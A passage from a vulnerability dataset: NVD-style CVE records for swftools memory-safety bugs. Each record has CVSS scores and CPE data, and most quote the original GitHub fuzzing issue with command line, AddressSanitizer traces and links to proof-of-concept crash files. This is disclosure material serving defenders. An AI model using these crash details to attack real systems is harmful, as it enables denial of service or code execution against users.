"exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/142" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/142" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:*:*:*:*:*:*:*:*", "matchCriteriaId": "192BB2B1-5CB5-4E87-AAB7-51ACC07D8934", "versionEndExcluding": null, "versionEndIncluding": "2020-07-10", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/matthiaskramm/swftools/issues/142
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
## System info Ubuntu x86_64, clang 6.0, swfdump (latest master [fad6c2](https://github.com/matthiaskramm/swftools/commit/fad6c2e7505efa62e68375d061a508f802c3e77c)) ## Command line ./src/swfdump -D @@ ## Output ``` Segmentation fault (core dumped) ``` ## AddressSanitizer output ``` ASAN:SIGSEGV ================================================================= ==10761==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55e604db1be8 bp 0x000000000000 sp 0x7fff2eb65500 T0) #0 0x55e604db1be7 in updateusage modules/swftext.c:566 #1 0x55e604da14f4 in swf_FontExtract_DefineTextCallback modules/swftext.c:516 #2 0x55e604da9ffe in swf_FontUpdateUsage modules/swftext.c:578 #3 0x55e604daa3c4 in swf_FontExtract modules/swftext.c:620 #4 0x55e604d6b5dc in fontcallback2 /home/seviezhou/swftools/src/swfdump.c:941 #5 0x55e604da3920 in swf_FontEnumerate modules/swftext.c:133 #6 0x55e604d68273 in main /home/seviezhou/swftools/src/swfdump.c:1296 #7 0x7f2499591b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #8 0x55e604d6b439 in _start (/home/seviezhou/swftools/src/swfdump+0xd0439) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV modules/swftext.c:566 updateusage ==10761==ABORTING ``` ## POC [SEGV-updateusage-swftext-566.zip](https://github.com/matthiaskramm/swftools/files/5041981/SEGV-updateusage-swftext-566.zip)
A Segmentation fault in swftext.c:566
https://api.github.com/repos/swftools/swftools/issues/142/comments
0
2020-08-07T14:33:40Z
2020-08-07T14:33:40Z
https://github.com/swftools/swftools/issues/142
675,056,883
142
2,591
CVE-2021-39595
2021-09-20T16:15:14.373
An issue was discovered in swftools through 20200710. A stack-buffer-overflow exists in the function rfx_alloc() located in mem.c. It allows an attacker to cause code Execution.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/141" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/141" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:*:*:*:*:*:*:*:*", "matchCriteriaId": "192BB2B1-5CB5-4E87-AAB7-51ACC07D8934", "versionEndExcluding": null, "versionEndIncluding": "2020-07-10", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/matthiaskramm/swftools/issues/141
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
## System info Ubuntu x86_64, clang 6.0, swfdump (latest master [fad6c2](https://github.com/matthiaskramm/swftools/commit/fad6c2e7505efa62e68375d061a508f802c3e77c)) ## Command line ./src/swfdump -D @@ ## Output ``` [stack:98 locals:0 scope:12-0 flags: need_rest has_optional has_param_names] slot:0 <metadata>final override function * NULL=()(0 params, 0 optional) [stack:98 locals:0 scope:12-0 flags: need_rest has_optional has_param_names] slot:0 <metadata>final override function * NULL=()(0 params, 0 optional) [stack:98 locals:0 scope:12-0 flags: need_rest has_optional has_param_names] slot:0 <metadata>final override function * NULL=()(0 params, 0 optional) [stack:98 locals:0 scope:12-0 flags: need_rest has_optional has_param_names] slot:0 <metadata>final override function * NULL=()(0 params, 0 optional) [stack:98 locals:0 scope:12-0 flags: need_rest has_optional has_param_names] slot:0 Segmentation fault (core dumped) ``` ## AddressSanitizer output ``` ASAN:SIGSEGV ================================================================= ==61651==ERROR: AddressSanitizer: stack-overflow on address 0x7ffed2a2cff8 (pc 0x7f0e233a17cc bp 0x7ffed2a2d910 sp 0x7ffed2a2d000 T0) #0 0x7f0e233a17cb (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x227cb) #1 0x7f0e234175e2 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x985e2) #2 0x560bfedb6ca7 in rfx_alloc /home/seviezhou/swftools/lib/mem.c:30 #3 0x560bfeda2885 in dict_put /home/seviezhou/swftools/lib/q.c:1147 #4 0x560bfecf6d18 in dump_method as3/abc.c:358 #5 0x560bfecf829a in traits_dump as3/abc.c:596 #6 0x560bfecf765a in dump_method as3/abc.c:403 #7 0x560bfecf829a in traits_dump as3/abc.c:596 #8 0x560bfecf765a in dump_method as3/abc.c:403 #9 0x560bfecf829a in traits_dump as3/abc.c:596 #10 0x560bfecf765a in dump_method as3/abc.c:403 #11 0x560bfecf829a in traits_dump as3/abc.c:596 #12 0x560bfecf765a in dump_method as3/abc.c:403 #13 0x560bfecf829a in traits_dump as3/abc.c:596 #14 0x560bfecf765a in dump_method as3/abc.c:403 #15 0x560bfecf829a in traits_dump as3/abc.c:596 #16 0x560bfecf765a in dump_method as3/abc.c:403 #17 0x560bfecf829a in traits_dump as3/abc.c:596 #18 0x560bfecf765a in dump_method as3/abc.c:403 #19 0x560bfecf829a in traits_dump as3/abc.c:596 #20 0x560bfecf765a in dump_method as3/abc.c:403 #21 0x560bfecf829a in traits_dump as3/abc.c:596 #22 0x560bfecf765a in dump_method as3/abc.c:403 #23 0x560bfecf829a in traits_dump as3/abc.c:596 #24 0x560bfecf765a in dump_method as3/abc.c:403 #25 0x560bfecf829a in traits_dump as3/abc.c:596 #26 0x560bfecf765a in dump_method as3/abc.c:403 #27 0x560bfecf829a in traits_dump as3/abc.c:596 #28 0x560bfecf765a in dump_method as3/abc.c:403 #29 0x560bfecf829a in traits_dump as3/abc.c:596 #30 0x560bfecf765a in dump_method as3/abc.c:403 #31 0x560bfecf829a in traits_dump as3/abc.c:596 #32 0x560bfecf765a in dump_method as3/abc.c:403 #33 0x560bfecf829a in traits_dump as3/abc.c:596 #34 0x560bfecf765a in dump_method as3/abc.c:403 #35 0x560bfecf829a in traits_dump as3/abc.c:596 #36 0x560bfecf765a in dump_method as3/abc.c:403 #37 0x560bfecf829a in traits_dump as3/abc.c:596 #38 0x560bfecf765a in dump_method as3/abc.c:403 #39 0x560bfecf829a in traits_dump as3/abc.c:596 #40 0x560bfecf765a in dump_method as3/abc.c:403 #41 0x560bfecf829a in traits_dump as3/abc.c:596 #42 0x560bfecf765a in dump_method as3/abc.c:403 #43 0x560bfecf829a in traits_dump as3/abc.c:596 #44 0x560bfecf765a in dump_method as3/abc.c:403 #45 0x560bfecf829a in traits_dump as3/abc.c:596 #46 0x560bfecf765a in dump_method as3/abc.c:403 #47 0x560bfecf829a in traits_dump as3/abc.c:596 #48 0x560bfecf765a in dump_method as3/abc.c:403 #49 0x560bfecf829a in traits_dump as3/abc.c:596 #50 0x560bfecf765a in dump_method as3/abc.c:403 #51 0x560bfecf829a in traits_dump as3/abc.c:596 #52 0x560bfecf765a in dump_method as3/abc.c:403 #53 0x560bfecf829a in traits_dump as3/abc.c:596 #54 0x560bfecf765a in dump_method as3/abc.c:403 #55 0x560bfecf829a in traits_dump as3/abc.c:596 #56 0x560bfecf765a in dump_method as3/abc.c:403 #57 0x560bfecf829a in traits_dump as3/abc.c:596 #58 0x560bfecf765a in dump_method as3/abc.c:403 #59 0x560bfecf829a in traits_dump as3/abc.c:596 #60 0x560bfecf765a in dump_method as3/abc.c:403 #61 0x560bfecf829a in traits_dump as3/abc.c:596 #62 0x560bfecf765a in dump_method as3/abc.c:403 #63 0x560bfecf829a in traits_dump as3/abc.c:596 #64 0x560bfecf765a in dump_method as3/abc.c:403 #65 0x560bfecf829a in traits_dump as3/abc.c:596 #66 0x560bfecf765a in dump_method as3/abc.c:403 #67 0x560bfecf829a in traits_dump as3/abc.c:596 #68 0x560bfecf765a in dump_method as3/abc.c:403 #69 0x560bfecf829a in traits_dump as3/abc.c:596 #70 0x560bfecf765a in dump_method as3/abc.c:403 #71 0x560bfecf829a in traits_dump as3/abc.c:596 #72 0x560bfecf765a in dump_method as3/abc.c:403 #73 0x560bfecf829a in traits_dump as3/abc.c:596 #74 0x560bfecf765a in dump_method as3/abc.c:403 #75 0x560bfecf829a in traits_dump as3/abc.c:596 #76 0x560bfecf765a in dump_method as3/abc.c:403 #77 0x560bfecf829a in traits_dump as3/abc.c:596 #78 0x560bfecf765a in dump_method as3/abc.c:403 #79 0x560bfecf829a in traits_dump as3/abc.c:596 #80 0x560bfecf765a in dump_method as3/abc.c:403 #81 0x560bfecf829a in traits_dump as3/abc.c:596 #82 0x560bfecf765a in dump_method as3/abc.c:403 #83 0x560bfecf829a in traits_dump as3/abc.c:596 #84 0x560bfecf765a in dump_method as3/abc.c:403 #85 0x560bfecf829a in traits_dump as3/abc.c:596 #86 0x560bfecf765a in dump_method as3/abc.c:403 #87 0x560bfecf829a in traits_dump as3/abc.c:596 #88 0x560bfecf765a in dump_method as3/abc.c:403 #89 0x560bfecf829a in traits_dump as3/abc.c:596 #90 0x560bfecf765a in dump_method as3/abc.c:403 #91 0x560bfecf829a in traits_dump as3/abc.c:596 #92 0x560bfecf765a in dump_method as3/abc.c:403 #93 0x560bfecf829a in traits_dump as3/abc.c:596 #94 0x560bfecf765a in dump_method as3/abc.c:403 #95 0x560bfecf829a in traits_dump as3/abc.c:596 #96 0x560bfecf765a in dump_method as3/abc.c:403 #97 0x560bfecf829a in traits_dump as3/abc.c:596 #98 0x560bfecf765a in dump_method as3/abc.c:403 #99 0x560bfecf829a in traits_dump as3/abc.c:596 #100 0x560bfecf765a in dump_method as3/abc.c:403 #101 0x560bfecf829a in traits_dump as3/abc.c:596 #102 0x560bfecf765a in dump_method as3/abc.c:403 #103 0x560bfecf829a in traits_dump as3/abc.c:596 #104 0x560bfecf765a in dump_method as3/abc.c:403 #105 0x560bfecf829a in traits_dump as3/abc.c:596 #106 0x560bfecf765a in dump_method as3/abc.c:403 #107 0x560bfecf829a in traits_dump as3/abc.c:596 #108 0x560bfecf765a in dump_method as3/abc.c:403 #109 0x560bfecf829a in traits_dump as3/abc.c:596 #110 0x560bfecf765a in dump_method as3/abc.c:403 #111 0x560bfecf829a in traits_dump as3/abc.c:596 #112 0x560bfecf765a in dump_method as3/abc.c:403 #113 0x560bfecf829a in traits_dump as3/abc.c:596 #114 0x560bfecf765a in dump_method as3/abc.c:403 #115 0x560bfecf829a in traits_dump as3/abc.c:596 #116 0x560bfecf765a in dump_method as3/abc.c:403 #117 0x560bfecf829a in traits_dump as3/abc.c:596 #118 0x560bfecf765a in dump_method as3/abc.c:403 #119 0x560bfecf829a in traits_dump as3/abc.c:596 #120 0x560bfecf765a in dump_method as3/abc.c:403 #121 0x560bfecf829a in traits_dump as3/abc.c:596 #122 0x560bfecf765a in dump_method as3/abc.c:403 #123 0x560bfecf829a in traits_dump as3/abc.c:596 #124 0x560bfecf765a in dump_method as3/abc.c:403 #125 0x560bfecf829a in traits_dump as3/abc.c:596 #126 0x560bfecf765a in dump_method as3/abc.c:403 #127 0x560bfecf829a in traits_dump as3/abc.c:596 #128 0x560bfecf765a in dump_method as3/abc.c:403 #129 0x560bfecf829a in traits_dump as3/abc.c:596 #130 0x560bfecf765a in dump_method as3/abc.c:403 #131 0x560bfecf829a in traits_dump as3/abc.c:596 #132 0x560bfecf765a in dump_method as3/abc.c:403 #133 0x560bfecf829a in traits_dump as3/abc.c:596 #134 0x560bfecf765a in dump_method as3/abc.c:403 #135 0x560bfecf829a in traits_dump as3/abc.c:596 #136 0x560bfecf765a in dump_method as3/abc.c:403 #137 0x560bfecf829a in traits_dump as3/abc.c:596 #138 0x560bfecf765a in dump_method as3/abc.c:403 #139 0x560bfecf829a in traits_dump as3/abc.c:596 #140 0x560bfecf765a in dump_method as3/abc.c:403 #141 0x560bfecf829a in traits_dump as3/abc.c:596 #142 0x560bfecf765a in dump_method as3/abc.c:403 #143 0x560bfecf829a in traits_dump as3/abc.c:596 #144 0x560bfecf765a in dump_method as3/abc.c:403 #145 0x560bfecf829a in traits_dump as3/abc.c:596 #146 0x560bfecf765a in dump_method as3/abc.c:403 #147 0x560bfecf829a in traits_dump as3/abc.c:596 #148 0x560bfecf765a in dump_method as3/abc.c:403 #149 0x560bfecf829a in traits_dump as3/abc.c:596 #150 0x560bfecf765a in dump_method as3/abc.c:403 #151 0x560bfecf829a in traits_dump as3/abc.c:596 #152 0x560bfecf765a in dump_method as3/abc.c:403 #153 0x560bfecf829a in traits_dump as3/abc.c:596 #154 0x560bfecf765a in dump_method as3/abc.c:403 #155 0x560bfecf829a in traits_dump as3/abc.c:596 #156 0x560bfecf765a in dump_method as3/abc.c:403 #157 0x560bfecf829a in traits_dump as3/abc.c:596 #158 0x560bfecf765a in dump_method as3/abc.c:403 #159 0x560bfecf829a in traits_dump as3/abc.c:596 #160 0x560bfecf765a in dump_method as3/abc.c:403 #161 0x560bfecf829a in traits_dump as3/abc.c:596 #162 0x560bfecf765a in dump_method as3/abc.c:403 #163 0x560bfecf829a in traits_dump as3/abc.c:596 #164 0x560bfecf765a in dump_method as3/abc.c:403 #165 0x560bfecf829a in traits_dump as3/abc.c:596 #166 0x560bfecf765a in dump_method as3/abc.c:403 #167 0x560bfecf829a in traits_dump as3/abc.c:596 #168 0x560bfecf765a in dump_method as3/abc.c:403 #169 0x560bfecf829a in traits_dump as3/abc.c:596 #170 0x560bfecf765a in dump_method as3/abc.c:403 #171 0x560bfecf829a in traits_dump as3/abc.c:596 #172 0x560bfecf765a in dump_method as3/abc.c:403 #173 0x560bfecf829a in traits_dump as3/abc.c:596 #174 0x560bfecf765a in dump_method as3/abc.c:403 #175 0x560bfecf829a in traits_dump as3/abc.c:596 #176 0x560bfecf765a in dump_method as3/abc.c:403 #177 0x560bfecf829a in traits_dump as3/abc.c:596 #178 0x560bfecf765a in dump_method as3/abc.c:403 #179 0x560bfecf829a in traits_dump as3/abc.c:596 #180 0x560bfecf765a in dump_method as3/abc.c:403 #181 0x560bfecf829a in traits_dump as3/abc.c:596 #182 0x560bfecf765a in dump_method as3/abc.c:403 #183 0x560bfecf829a in traits_dump as3/abc.c:596 #184 0x560bfecf765a in dump_method as3/abc.c:403 #185 0x560bfecf829a in traits_dump as3/abc.c:596 #186 0x560bfecf765a in dump_method as3/abc.c:403 #187 0x560bfecf829a in traits_dump as3/abc.c:596 #188 0x560bfecf765a in dump_method as3/abc.c:403 #189 0x560bfecf829a in traits_dump as3/abc.c:596 #190 0x560bfecf765a in dump_method as3/abc.c:403 #191 0x560bfecf829a in traits_dump as3/abc.c:596 #192 0x560bfecf765a in dump_method as3/abc.c:403 #193 0x560bfecf829a in traits_dump as3/abc.c:596 #194 0x560bfecf765a in dump_method as3/abc.c:403 #195 0x560bfecf829a in traits_dump as3/abc.c:596 #196 0x560bfecf765a in dump_method as3/abc.c:403 #197 0x560bfecf829a in traits_dump as3/abc.c:596 #198 0x560bfecf765a in dump_method as3/abc.c:403 #199 0x560bfecf829a in traits_dump as3/abc.c:596 #200 0x560bfecf765a in dump_method as3/abc.c:403 #201 0x560bfecf829a in traits_dump as3/abc.c:596 #202 0x560bfecf765a in dump_method as3/abc.c:403 #203 0x560bfecf829a in traits_dump as3/abc.c:596 #204 0x560bfecf765a in dump_method as3/abc.c:403 #205 0x560bfecf829a in traits_dump as3/abc.c:596 #206 0x560bfecf765a in dump_method as3/abc.c:403 #207 0x560bfecf829a in traits_dump as3/abc.c:596 #208 0x560bfecf765a in dump_method as3/abc.c:403 #209 0x560bfecf829a in traits_dump as3/abc.c:596 #210 0x560bfecf765a in dump_method as3/abc.c:403 #211 0x560bfecf829a in traits_dump as3/abc.c:596 #212 0x560bfecf765a in dump_method as3/abc.c:403 #213 0x560bfecf829a in traits_dump as3/abc.c:596 #214 0x560bfecf765a in dump_method as3/abc.c:403 #215 0x560bfecf829a in traits_dump as3/abc.c:596 #216 0x560bfecf765a in dump_method as3/abc.c:403 #217 0x560bfecf829a in traits_dump as3/abc.c:596 #218 0x560bfecf765a in dump_method as3/abc.c:403 #219 0x560bfecf829a in traits_dump as3/abc.c:596 #220 0x560bfecf765a in dump_method as3/abc.c:403 #221 0x560bfecf829a in traits_dump as3/abc.c:596 #222 0x560bfecf765a in dump_method as3/abc.c:403 #223 0x560bfecf829a in traits_dump as3/abc.c:596 #224 0x560bfecf765a in dump_method as3/abc.c:403 #225 0x560bfecf829a in traits_dump as3/abc.c:596 #226 0x560bfecf765a in dump_method as3/abc.c:403 #227 0x560bfecf829a in traits_dump as3/abc.c:596 #228 0x560bfecf765a in dump_method as3/abc.c:403 #229 0x560bfecf829a in traits_dump as3/abc.c:596 #230 0x560bfecf765a in dump_method as3/abc.c:403 #231 0x560bfecf829a in traits_dump as3/abc.c:596 #232 0x560bfecf765a in dump_method as3/abc.c:403 #233 0x560bfecf829a in traits_dump as3/abc.c:596 #234 0x560bfecf765a in dump_method as3/abc.c:403 #235 0x560bfecf829a in traits_dump as3/abc.c:596 #236 0x560bfecf765a in dump_method as3/abc.c:403 #237 0x560bfecf829a in traits_dump as3/abc.c:596 #238 0x560bfecf765a in dump_method as3/abc.c:403 #239 0x560bfecf829a in traits_dump as3/abc.c:596 #240 0x560bfecf765a in dump_method as3/abc.c:403 #241 0x560bfecf829a in traits_dump as3/abc.c:596 #242 0x560bfecf765a in dump_method as3/abc.c:403 #243 0x560bfecf829a in traits_dump as3/abc.c:596 #244 0x560bfecf765a in dump_method as3/abc.c:403 #245 0x560bfecf829a in traits_dump as3/abc.c:596 #246 0x560bfecf765a in dump_method as3/abc.c:403 #247 0x560bfecf829a in traits_dump as3/abc.c:596 #248 0x560bfecf765a in dump_method as3/abc.c:403 #249 0x560bfecf829a in traits_dump as3/abc.c:596 #250 0x560bfecf765a in dump_method as3/abc.c:403 #251 0x560bfecf829a in traits_dump as3/abc.c:596 SUMMARY: AddressSanitizer: stack-overflow ??:0 ?? ==61651==ABORTING ``` ## POC [stack-overflow-dict_put-q-1147.zip](https://github.com/matthiaskramm/swftools/files/5041974/stack-overflow-dict_put-q-1147.zip)
A stack overflow in q.c:1147 causes Segmentation fault
https://api.github.com/repos/swftools/swftools/issues/141/comments
0
2020-08-07T14:31:43Z
2020-08-07T14:31:43Z
https://github.com/swftools/swftools/issues/141
675,055,595
141
2,592
CVE-2021-39596
2021-09-20T16:15:14.417
An issue was discovered in swftools through 20200710. A NULL pointer dereference exists in the function code_parse() located in code.c. It allows an attacker to cause Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/146" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/146" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:*:*:*:*:*:*:*:*", "matchCriteriaId": "192BB2B1-5CB5-4E87-AAB7-51ACC07D8934", "versionEndExcluding": null, "versionEndIncluding": "2020-07-10", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/matthiaskramm/swftools/issues/146
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
## System info Ubuntu x86_64, clang 6.0, swfdump (latest master [fad6c2](https://github.com/matthiaskramm/swftools/commit/fad6c2e7505efa62e68375d061a508f802c3e77c)) ## Command line ./src/swfdump -D @@ ## Output ``` Segmentation fault (core dumped) ``` ## AddressSanitizer output ``` ASAN:SIGSEGV ================================================================= ==80352==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f3928a955a1 bp 0x7ffc790bda50 sp 0x7ffc790bd1d8 T0) #0 0x7f3928a955a0 (/lib/x86_64-linux-gnu/libc.so.6+0x18e5a0) #1 0x7f3928f771a8 in strdup (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x621a8) #2 0x55cb3f1d0417 in code_parse as3/code.c:357 #3 0x55cb3f1ad810 in swf_ReadABC as3/abc.c:877 #4 0x55cb3f121003 in main /home/seviezhou/swftools/src/swfdump.c:1577 #5 0x7f3928928b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #6 0x55cb3f124439 in _start (/home/seviezhou/swftools/src/swfdump+0xd0439) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV ??:0 ?? ==80352==ABORTING ``` ## POC [SEGV-code_parse-code-357.zip](https://github.com/matthiaskramm/swftools/files/5042029/SEGV-code_parse-code-357.zip)
A Segmentation fault in code.c:357
https://api.github.com/repos/swftools/swftools/issues/146/comments
0
2020-08-07T14:43:02Z
2020-08-07T14:43:02Z
https://github.com/swftools/swftools/issues/146
675,062,723
146
2,593
CVE-2021-39597
2021-09-20T16:15:14.460
An issue was discovered in swftools through 20200710. A NULL pointer dereference exists in the function code_dump2() located in code.c. It allows an attacker to cause Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/143" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/143" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:*:*:*:*:*:*:*:*", "matchCriteriaId": "192BB2B1-5CB5-4E87-AAB7-51ACC07D8934", "versionEndExcluding": null, "versionEndIncluding": "2020-07-10", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/matthiaskramm/swftools/issues/143
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
## System info Ubuntu x86_64, clang 6.0, swfdump (latest master [fad6c2](https://github.com/matthiaskramm/swftools/commit/fad6c2e7505efa62e68375d061a508f802c3e77c)) ## Command line ./src/swfdump -D @@ ## Output ``` Segmentation fault (core dumped) ``` ## AddressSanitizer output ``` ASAN:SIGSEGV ================================================================= ==22794==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000018 (pc 0x55ca6dccf468 bp 0x000000000000 sp 0x7ffcc4b1cd30 T0) #0 0x55ca6dccf467 in code_dump2 as3/code.c:982 #1 0x55ca6dc986bf in dump_method as3/abc.c:405 #2 0x55ca6dca3433 in swf_DumpABC as3/abc.c:722 #3 0x55ca6dc19038 in main /home/seviezhou/swftools/src/swfdump.c:1578 #4 0x7f1480cd1b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #5 0x55ca6dc1c439 in _start (/home/seviezhou/swftools/src/swfdump+0xd0439) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV as3/code.c:982 code_dump2 ==22794==ABORTING ``` ## POC [SEGV-code_dump2-code-982.zip](https://github.com/matthiaskramm/swftools/files/5041991/SEGV-code_dump2-code-982.zip)
A Segmentation fault in code.c:982
https://api.github.com/repos/swftools/swftools/issues/143/comments
0
2020-08-07T14:35:45Z
2020-08-07T14:35:45Z
https://github.com/swftools/swftools/issues/143
675,058,230
143
2,594
CVE-2021-39598
2021-09-20T16:15:14.503
An issue was discovered in swftools through 20200710. A NULL pointer dereference exists in the function callcode() located in code.c. It allows an attacker to cause Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/145" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/145" } ]
